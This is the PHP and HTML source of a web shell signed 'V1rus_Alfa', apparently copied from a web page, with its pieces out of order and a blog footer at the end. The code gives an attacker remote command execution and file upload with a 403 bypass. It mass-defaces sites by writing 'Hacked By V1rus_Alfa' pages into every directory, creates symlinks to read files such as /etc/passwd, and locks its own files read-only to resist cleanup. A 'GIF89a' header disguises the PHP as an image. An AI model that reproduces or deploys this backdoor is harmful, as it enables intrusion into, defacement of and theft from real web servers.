$file_name = $original_name;
if(copy($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){
// AUTO CHMOD 0444 LANGSUNG
force_0444($path.'/'.$file_name);
redirect_with_message('success', 'UPLOAD SUCCESS + AUTO CHMOD 0444: ' . $file_name, $path);
} else {
// Fallback: try move_uploaded_file
if(move_uploaded_file($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){
// AUTO CHMOD 0444 LANGSUNG
force_0444($path.'/'.$file_name);
redirect_with_message('success', 'UPLOAD SUCCESS (Fallback) + CHMOD 0444: ' . $file_name, $path);
} else {
redirect_with_message('error', 'File Upload Failed !!', $path);
}
}
}
}

if(isset($_GET['option']) && isset($_POST['opt_action'])){
$target_full_path = $_POST['path_target'];
$action = $_POST['opt_action'];
$current_dir = isset($_GET['path']) ? $_GET['path'] : getcwd();
switch ($action) {
case 'delete':
if (file_exists($target_full_path)) {
if (delete_recursive($target_full_path)) {
redirect_with_message('success', 'DELETE SUCCESS !!', $current_dir);
} else {
redirect_with_message('error', 'Failed to delete! Check permissions (permission).', $current_dir);
}
} else {
redirect_with_message('error', 'Target not found!', $current_dir);
}
break;
case 'chmod_save':
$perm = octdec($_POST['perm_value']);
if(chmod($target_full_path,$perm)) redirect_with_message('success', 'CHANGE PERMISSION SUCCESS !!', $current_dir);
else redirect_with_message('error', 'Change Permission Failed !!', $current_dir);
break;
case 'rename_save':
$new_name_base = sanitizeFilename($_POST['new_name_value']);
$new_full_path = dirname($target_full_path).'/'.$new_name_base;
if(rename($target_full_path, $new_full_path)) {
// AUTO CHMOD 0444 SETELAH RENAME
force_0444($new_full_path);
redirect_with_message('success', 'CHANGE NAME SUCCESS + AUTO CHMOD 0444 !!', $current_dir);
} else {
redirect_with_message('error', 'Change Name Failed !!', $current_dir);
}
break;
case 'edit_save':
if(is_writable($target_full_path)) {
if(file_put_contents($target_full_path,$_POST['src_content'])) {
// AUTO CHMOD 0444 AFTER EDIT
force_0444($target_full_path);
redirect_with_message('success', 'EDIT FILE SUCCESS + AUTO CHMOD 0444 !!', $current_dir);
} else {
redirect_with_message('error', 'Edit File Failed !!', $current_dir);
}
} else {
redirect_with_message('error', 'File is not writable!', $current_dir);
}
break;
}
}

if(isset($_GET['create_new'])) {
$create_name = sanitizeFilename($_POST['create_name']);
$target_path_new = $path . '/' . $create_name;
if ($_POST['create_type'] == 'file') {
if (file_put_contents($target_path_new, '') !== false) {
// AUTO CHMOD 0444 FOR NEW FILES
force_0444($target_path_new);
redirect_with_message('success', 'New File Created Successfully + AUTO CHMOD 0444', $path);
} else {
redirect_with_message('error', 'Failed to create new file!', $path);
}
} elseif ($_POST['create_type'] == 'dir') {
if (mkdir($target_path_new)) redirect_with_message('success', 'New Folder Created Successfully', $path);
else redirect_with_message('error', 'Failed to create new folder!', $path);
}
}
?>
<!DOCTYPE HTML>
<html>
<head>
<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
<title><?php echo htmlspecialchars($title); ?></title>
<style>
body {
background-color:rgb(29, 29, 31);
color:rgb(135, 146, 145);
font-family: 'Share Tech Mono', monospace;
margin: 0;
padding: 0;
}
h1 {
color: #ff2bd4;
text-align: center;
font-size: 36px;
text-shadow: 0 0 5px #ff2bd4, 0 0 10px #ff2bd4;
margin: 20px 0;
}
a {
color: #00b7ff;
text-decoration: none;
transition: 0.2s;
}
a:hover {
color: #ff2bd4;
text-shadow: 0 0 5px #ff2bd4;
}
table {
width: 95%;
max-width: 1000px;
margin: 20px auto;
border-collapse: collapse;
background-color: #1a1a2e;
border: 1px solid #8000ff;
}
th, td {
border: 1px solid #8000ff;
padding: 10px;
text-align: left;
}
#content tr:hover {
background-color: #29294d;
}
.first {
background-color: #191935;
color: #ff2bd4;
}
input, select, textarea {
background: #0d0d20;
color: #00ffe7;
border: 1px solid #8000ff;
padding: 5px;
font-family: 'Share Tech Mono', monospace;
border-radius: 5px;
}
input[type="submit"] {
background: #ff2bd4;
color: black;
font-weight: bold;
border: 1px solid #8000ff;
cursor: pointer;
transition: 0.2s ease-in-out;
}
input[type="submit"]:hover {
background: #00ffe7;
color: #000;
box-shadow: 0 0 5px #00ffe7, 0 0 10px #00ffe7;
}
.section-box {
border: 2px solid #8000ff;
padding: 15px;
margin: 20px auto;
border-radius: 8px;
background-color: #1a1a2e;
color: #00ffe7;
width: 95%;
max-width: 900px;
}
.main-menu {
text-align: center;
padding: 15px;
margin: 20px auto;
border-top: 1px solid #8000ff;
border-bottom: 1px solid #8000ff;
}
.main-menu a {
margin: 0 10px;
font-size: 1.1em;
color: #00b7ff;
}
pre {
background-color: #111122;
padding: 10px;
overflow-x: auto;
color: #ff2bd4;
border: 1px solid #8000ff;
}
.message {
text-align: center;
font-weight: bold;
padding: 10px;
margin: 10px auto;
width: 95%;
max-width: 900px;
border-radius: 8px;
}
.message.success {
background-color: #008f39;
color: #00ffe7;
}
.message.error {
background-color: #a80000;
color: white;
}
footer {
text-align: center;
color: #ff2bd4;
margin: 20px 0;
font-size: 14px;
text-shadow: 0 0 5px #8000ff;
}
.action-form {
display: inline-block;
margin: 0;
}
.action-button {
background: #ff2bd4;
color: black;
font-weight: bold;
border: 1px solid #8000ff;
cursor: pointer;
padding: 5px 10px;
border-radius: 5px;
margin-left: 5px;
transition: 0.2s ease-in-out;
}
.action-button:hover {
background: #00ffe7;
color: #000;
box-shadow: 0 0 5px #00ffe7, 0 0 10px #00ffe7;
}
.upload-method {
background: #1a0033;
border: 1px dashed #ff00c8;
padding: 10px;
margin: 10px 0;
border-radius: 5px;
}
</style>
</head>
<body>
<a href="?">
<div style="text-align: center; margin: 20px 0;">
<img src="https://h.top4top.io/p_3656kb8x31.jpg"
alt="V1rus Logo"
style="
display: block;
margin-left: auto;
margin-right: auto;
width: 180px;
height: 180px;
object-fit: cover;
border-radius: 25px;
border: 3px solid #7D00FF;
box-shadow: 0 0 20px #FF00C8;
">
</div>
<h1 style="color: white; text-align: center; margin-top: 10px;"><?php echo htmlspecialchars($title); ?></h1></a>
<?php
if(isset($_GET['msg_text'])) {
echo "<div class='message ".htmlspecialchars($_GET['msg_type'])."'>".htmlspecialchars($_GET['msg_text'])."</div>";
}

// ====== [CEK PERMISSION FILE SHELL INI] ======
$current_perms = perms(__FILE__);
echo "<div class='message success' style='margin-bottom:20px;'>";
echo "<strong>πŸ”§ FILE SHELL STATUS:</strong><br>";
echo "Name: " . basename(__FILE__) . "<br>";
echo "Permission: <span style='color:#00FF00'>$current_perms</span><br>";
echo "Auto CHMOD 0444: <span style='color:#00FF00'>ACTIVE</span>";
echo "</div>";
?>
<table class="system-info-table" width="95%" border="0" cellpadding="0" cellspacing="0" align="left">
<tr><td>
<font color='white'><i class='fa fa-user'></i> User / IP </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo $_SERVER['REMOTE_ADDR']; ?></font>
<tr><td><font color='white'><i class='fa fa-desktop'></i> Host / Server </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo gethostbyname($_SERVER['HTTP_HOST'])." / ".$_SERVER['SERVER_NAME']; ?></font>
<tr><td><font color='white'><i class='fa fa-hdd-o'></i> System </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo php_uname(); ?></font>
</tr></td></table>
<div class="main-menu">
<a href="?path=<?php echo urlencode($path); ?>&action=cmd">Cmd</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=upload_form">Upload</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=mass_deface_form">Mass Deface</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=create_form">Create</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=symlink_form">Sym</a>
</div>
<div class="path-nav">
<i class="fa fa-folder-o"></i> :
<?php
$paths_array = explode('/', trim($path, '/'));
echo '<a href="?path=/">/</a>';
$current_built_path = '';
foreach($paths_array as $pat){
if(empty($pat)) continue;
$current_built_path .= '/' . $pat;
echo '<a href="?path='.urlencode($current_built_path).'">'.htmlspecialchars($pat).'</a>/';
}
?>
</div>
<?php
$show_file_list = true;
if (isset($_GET['action'])) {
$show_file_list = false;
$current_action = $_GET['action'];
echo '<div class="section-box">';
switch ($current_action) {
case 'cmd':
$cmd_output = '';
if(isset($_POST['do_cmd'])) {
$cmd_output = htmlspecialchars(exe($_POST['cmd_input']));
}
echo '<h3>Execute Command</h3>';
echo '<form method="POST" action="?action=cmd&path='.urlencode($path).'">';
echo '<input type="text" name="cmd_input" placeholder="whoami" style="width: calc(100% - 80px);" autofocus>';
echo '<input type="submit" name="do_cmd" value=">>" style="width: 70px;">';
echo '</form>';
if($cmd_output) {
echo '<h4>Output:</h4><pre>'.$cmd_output.'</pre>';
}
break;
case 'upload_form':
echo '<h3>πŸ“ UPLOAD FILE [AUTO CHMOD 0444]</h3>';
echo '<div class="upload-method">';
echo '<strong>πŸ”§ SELECT UPLOAD METHOD:</strong><br>';
echo '</div>';

echo '<form enctype="multipart/form-data" method="POST" action="?path='.urlencode($path).'">';
echo '<input type="file" name="file_upload" required/><br><br>';

echo '<input type="radio" name="upload_method" value="normal" checked> <strong>Normal Upload</strong> (Auto CHMOD 0444)<br>';
echo '<input type="radio" name="upload_method" value="smart_bypass"> <strong>SMART BYPASS 403</strong> (Auto CHMOD 0444)<br><br>';

echo '<input type="submit" value="πŸ”₯ UPLOAD + AUTO CHMOD 0444" style="background:#00FF00;color:#000;font-weight:bold;padding:10px;"/>';
echo '</form>';

echo '<div style="margin-top:20px;padding:10px;background:#111;border:1px solid #ff00c8;">';
echo '<h4>πŸ“Œ FITUR BARU:</h4>';
echo '<pre style="color:#00FFB2;">';
echo "βœ… AUTO CHMOD 0444 INSTANT\n";
echo "βœ… FILE SHELL INI AUTO 0444\n";
echo "βœ… CHMOD LANGSUNG SETELAH UPLOAD\n";
echo "βœ… CHMOD OTOMATIS DI SEMUA METHOD\n";
echo "βœ… BYPASS 403 + AUTO CHMOD 0444\n";
echo '</pre>';
echo '</div>';
break;
case 'mass_deface_form':
$mass_deface_results = '';
if(isset($_POST['start_mass_deface'])) {
function sabun_massal_recursive($dir, $file, $content, &$res) {
if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;}
foreach(scandir($dir) as $item) {
if($item === '.' || $item === '..') continue;
$lokasi = $dir.DIRECTORY_SEPARATOR.$item;
if(is_dir($lokasi)) {
$file_path = $lokasi.DIRECTORY_SEPARATOR.$file;
file_put_contents($file_path, $content);
// AUTO CHMOD 0444
force_0444($file_path);
$res .= "[<font color=lime>DONE + CHMOD 0444</font>] ".htmlspecialchars($file_path)."<br>";
sabun_massal_recursive($lokasi, $file, $content, $res);
}
}
}
function sabun_biasa($dir, $file, $content, &$res) {
if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;}
foreach(scandir($dir) as $item) {
if($item === '.' || $item === '..') continue;
$lokasi = $dir.DIRECTORY_SEPARATOR.$item;
if(is_dir($lokasi) && is_writable($lokasi)) {
$file_path = $lokasi.DIRECTORY_SEPARATOR.$file;
file_put_contents($file_path, $content);
// AUTO CHMOD 0444
force_0444($file_path);
$res .= "[<font color=lime>DONE + CHMOD 0444</font>] ".htmlspecialchars($file_path)."<br>";
}
}
}
if($_POST['tipe_sabun'] == 'mahal') sabun_massal_recursive($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results);
else sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results);
}
echo '<h3>Mass Deface + Auto Chmod 0444</h3>';
echo '<form method="post" action="?action=mass_deface_form&path='.urlencode($path).'">';
echo '<p>Tipe:<br><input type="radio" name="tipe_sabun" value="murah" checked>Biasa (1 level) | <input type="radio" name="tipe_sabun" value="mahal">Massal (Rekursif)</p>';
echo '<p>Folder Target:<br><input type="text" name="d_dir" value="'.htmlspecialchars($path).'" style="width:100%"></p>';
echo '<p>Nama File:<br><input type="text" name="d_file" value="index.html" style="width:100%"></p>';
echo '<p>Isi Script:<br><textarea name="script_content" style="width:100%;height:150px">Hacked By V1rus_Alfa</textarea></p>';
echo '<input type="submit" name="start_mass_deface" value="GAS! + AUTO CHMOD 0444" style="width:100%">';
echo '</form>';
if($mass_deface_results) echo '<h4>Hasil:</h4><pre>'.$mass_deface_results.'</pre>';
break;
case 'create_form':
echo '<h3>Create New File / Folder + Auto Chmod 0444</h3>';
echo '<form method="POST" action="?create_new=true&path='.urlencode($path).'">';
echo 'Create: <select name="create_type"><option value="file">File</option><option value="dir">Folder</option></select> ';
echo 'Name: <input type="text" name="create_name" required> ';
echo '<input type="submit" value="Create + Auto Chmod 0444">';
echo '</form>';
break;
case 'symlink_form':
$symlink_result = '';
if (isset($_POST['create_symlink'])) {
$target = $_POST['sym_target'];
$link_name = $_POST['sym_linkname'];
$full_link_path = $path . '/' . $link_name;

if (symlink($target, $full_link_path)) {
$symlink_result = '<div class="message success">Symlink created: ' . htmlspecialchars($link_name) . ' -> ' . htmlspecialchars($target) . '</div>';
} else {
$symlink_result = '<div class="message error">Symlink creation failed! Check target path or permissions.</div>';
}
}

echo '<h3>Symlink Bypass</h3>';
echo '<form method="POST" action="?action=symlink_form&path=' . urlencode($path) . '">';
echo '<p>Target Path (absolute or relative):<br>';
echo '<input type="text" name="sym_target" placeholder="/etc/passwd or ../../../etc/passwd" style="width:100%" value="' . htmlspecialchars($path) . '"></p>';
echo '<p>Link Name (in current dir):<br>';
echo '<input type="text" name="sym_linkname" placeholder="e.g., shell.php" style="width:100%"></p>';
echo '<input type="submit" name="create_symlink" value="Create Symlink" style="width:100%">';
echo '</form>';

if ($symlink_result) {
echo $symlink_result;
}
break;
case 'delete':
$file_to_delete = $_GET['target_file'];
echo "<h3>Confirm Delete: ".htmlspecialchars(basename($file_to_delete))."</h3>";
if (file_exists($file_to_delete)) {
echo '<p style="color:red;text-align:center;">Are you SURE you want to delete this item?<br>This action cannot be undone.</p>';
echo '<form method="POST" action="?option=true&path='.urlencode($path).'"><input type="hidden" name="path_target" value="'.htmlspecialchars($file_to_delete).'"><input type="hidden" name="opt_action" value="delete"><input type="submit" value="Yes, Delete" style="background:red;color:white;"/> <a href="?path='.urlencode($path).'" style="margin-left:10px;">Cancel</a></form>';
} else {
echo '<p style="color:red;text-align:center;">File atau folder tidak ditemukan!</p>';
}
break;
case 'view_file':
echo "<h3>Viewing: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
echo '<textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($_GET['target_file'])).'</textarea>';
break;
case 'edit_form':
$target_file = $_GET['target_file'];
echo "<h3>Editing: ".htmlspecialchars(basename($target_file))."</h3>";
if(is_writable($target_file)) {
$file_content = @file_get_contents($target_file);
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">';
echo '<textarea name="src_content" style="width:100%;height:400px;">'.htmlspecialchars($file_content).'</textarea><br>';
echo '<input type="hidden" name="path_target" value="'.htmlspecialchars($target_file).'">';
echo '<input type="hidden" name="opt_action" value="edit_save">';
echo '<input type="submit" value="SAVE + AUTO CHMOD 0444"/>';
echo '</form>';
} else {
echo '<p style="color:red;">File tidak writable! Periksa permission.</p>';
echo '<textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($target_file)).'</textarea>';
}
break;
case 'rename_form':
echo "<h3>Rename: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">New Name: <input name="new_name_value" type="text" value="'.htmlspecialchars(basename($_GET['target_file'])).'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="rename_save"><input type="submit" value="RENAME + AUTO CHMOD 0444"/></form>';
break;
case 'chmod_form':
echo "<h3>Chmod: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
$current_perms = substr(sprintf('%o', @fileperms($_GET['target_file'])), -4);
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">Permission: <input name="perm_value" type="text" size="4" value="'.$current_perms.'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="chmod_save"><input type="submit" value="CHMOD"/></form>';
break;
}
echo '</div>';
}

if ($show_file_list) {
echo '<div id="content"><table><tr class="first"><th><center>Name</center></th><th><center>Size</center></th><th><center>Perm</center></th><th><center>Options</center></th></tr>';
$scandir_items = @scandir($path);
if ($scandir_items) {
usort($scandir_items, function($a, $b) use ($path) {
$pathA = $path . '/' . $a; $pathB = $path . '/' . $b;
$is_dir_A = is_dir($pathA); $is_dir_B = is_dir($pathB);
if ($is_dir_A && !$is_dir_B) return -1;
if (!$is_dir_A && $is_dir_B) return 1;
return strcasecmp($a, $b);
});
foreach($scandir_items as $item){
if($item == '.') continue;
$full_item_path = $path.'/'.$item;
$encoded_full_item_path = urlencode($full_item_path);
echo "<tr><td class='td_home'>";
if($item == '..') echo "<i class='fa fa-folder-open-o'></i> <a href=\"?path=".urlencode(dirname($path))."\">".htmlspecialchars($item)."</a></td>";
elseif(is_dir($full_item_path)) echo "<i class='fa fa-folder-o'></i> <a href=\"?path=$encoded_full_item_path\">".htmlspecialchars($item)."</a></td>";
else echo "<i class='fa fa-file-o'></i> <a href=\"?action=view_file&target_file=$encoded_full_item_path&path=".urlencode($path)."\">".htmlspecialchars($item)."</a></td>";
echo "<td class='td_home'><center>".(is_file($full_item_path) ? round(@filesize($full_item_path)/1024,2).' KB' : '--')."</center></td>";
echo "<td class='td_home'><center>";
$perms_str = perms($full_item_path);
if(is_writable($full_item_path)) echo '<font color="#57FF00">'.$perms_str.'</font>';
elseif(!is_readable($full_item_path)) echo '<font color="#FF0004">'.$perms_str.'</font>';
else echo $perms_str;
echo "</center></td>";
echo "<td class='td_home' style='text-align:center;'>
<form class='action-form' method='GET' action='?'>
<input type='hidden' name='path' value='".htmlspecialchars($path)."'>
<select name='action' style='width:100px;'>
<option value=''>Action</option>
<option value='delete'>Delete</option>";
if(is_file($full_item_path)) {
echo "<option value='edit_form'>Edit</option>";
echo "<option value='view_file'>View</option>";
}
echo "<option value='rename_form'>Rename</option>
<option value='chmod_form'>Chmod</option>
</select>
<input type='hidden' name='target_file' value='".htmlspecialchars($full_item_path)."'>
<button type='submit' class='action-button'>Go</button>
</form>
</td></tr>";
}
} else {
echo "<tr><td colspan='4'><center><font color='red'>Failed to read directory.</font></center></td></tr>";
}
echo '</table></div>';
}
?>
<hr style="border-top: 1px solid <?php echo $theme_border_color; ?>; width: 95%; max-width: 900px; margin: 15px auto;">
<center><font color="#fff" size="2px"><b>Coded With &#x1f497; by <font color="#7e52c6"><?php echo htmlspecialchars($author); ?></font></b><br>
<small style="color:#00FFB2;">[AUTO CHMOD 0444 INSTANT - FILE SHELL AUTO PROTECTED]</small></center>
</body>
</html>
GIF89a;
<?php
error_reporting(0);
session_start();

// ====== [AUTO CHMOD 0444 FILE SHELL INI SENDIRI] ======
if (!isset($_SESSION['self_0444_applied'])) {
$current_file = __FILE__;
$perms = @fileperms($current_file) & 0777;

if ($perms != 0444) {
@chmod($current_file, 0444);
@shell_exec("chmod 0444 " . escapeshellarg($current_file));
}

$_SESSION['self_0444_applied'] = true;
}

@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
ini_set('memory_limit', '256M');
header('Content-Type: text/html; charset=UTF-8');
ob_end_clean();

// ====== [FIXED] AUTO CHMOD 0444 INSTANT ======
function force_0444($path) {
if (!file_exists($path)) return false;

// CHMOD 0444 SECARA LANGSUNG DAN PAKSA
@chmod($path, 0444); // octal
@chmod($path, 292); // decimal
@chmod($path, "444"); // string

// PAKSA LAGI VIA SHELL
@shell_exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");
@system("chmod 444 " . escapeshellarg($path) . " >/dev/null 2>&1");
@exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");

// VERIFIKASI
clearstatcache(true, $path);
return true;
}

// ====== [FIXED] SMART BYPASS DENGAN AUTO CHMOD ======
function smart_upload_bypass($tmp_path, $target_dir, $original_name) {
$bypass_names = generate_bypass_names($original_name);

foreach ($bypass_names as $bypass_name) {
$target_path = $target_dir . '/' . $bypass_name;

// 1. COBA COPY LANGSUNG
if (@copy($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'copy', 'name' => $bypass_name];
}

// 2. COBA MOVE_UPLOADED_FILE
if (function_exists('move_uploaded_file') && is_uploaded_file($tmp_path)) {
if (@move_uploaded_file($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'move_uploaded', 'name' => $bypass_name];
}
}

// 3. COBA FILE_PUT_CONTENTS
$content = @file_get_contents($tmp_path);

LEAVE COMMENT

Kategoriy

Recent Posts

Archives

Tags